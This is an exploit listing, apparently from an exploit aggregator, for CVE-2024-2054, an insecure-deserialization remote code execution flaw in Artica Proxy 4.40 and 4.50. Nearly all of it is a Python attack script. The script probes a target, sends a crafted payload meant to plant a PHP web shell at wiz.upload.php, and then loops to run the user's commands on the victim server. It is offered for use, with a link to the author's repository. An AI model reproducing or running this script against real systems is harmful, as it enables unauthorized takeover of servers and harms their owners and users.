Exploit for Artica Proxy 4.50 Remote Code Execution CVE-2024-2054

Name: Exploit for Artica Proxy 4.50 Remote Code Execution CVE-2024-2054
Rating: 5 (50 reviews)
2025-04-09 | CVSS 9.8
## https://sploitus.com/exploit?id=PACKETSTORM:190376
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web application insecure deserialization (RCE)
    # Google Dork:
    # Date: 23-04-2024
    # Exploit Author: Madan
    # Vendor Homepage: https://artica-proxy.com/
    # Version: 4.40, 4.50
    # Tested on: [relevant os]
    # CVE : CVE-2024-2054
    
    you can also find the exploit on my github repo:
    https://github.com/Madan301/CVE-2024-2054
    
    
    import requests
    import base64
    import urllib3
    from colorama import Fore
    
    print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
    sometimes vary from how artica proxy interface is hosted")
    
    URL = input("Enter url: ")
    if URL[-1]=="/":
        ACTUAL_URL = URL[:-1]
    else:
        ACTUAL_URL = URL
    
    ARTICA_URL = ACTUAL_URL
    
    def check(ARTICA_URL):
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        try:
            check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
        except Exception as e:
            print(Fore.RED+"Could not reach, check URL")
        if check.status_code==200:
            print(Fore.GREEN+"Vulnerable")
            return True
        else:
            print(Fore.RED+"Not Vulnerable")
    
    
    def exploit(ARTICA_URL):
    
        payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
        payload_data = {
            "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
                "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
                "cache_serializer": "json",
                "cache_size": 999999999,
                "cache_data": {
                    payload: {
                        "cache_date": 0,
                        "ttl": 999999999
                    }
                }
            }
        }
    
    
        while True:
            PAYLOAD_CMD = input("enter command: ")
            url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            response = requests.get(url, verify=False)
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            if response.status_code == 200:
                cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
                cmd_response = requests.get(cmd_url, verify=False)
                urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
                print(cmd_response.text)
            else:
                print("Failed to execute the payload")
    
    check = check(ARTICA_URL=ACTUAL_URL)
    if check==True:
        exploit(ARTICA_URL=ARTICA_URL)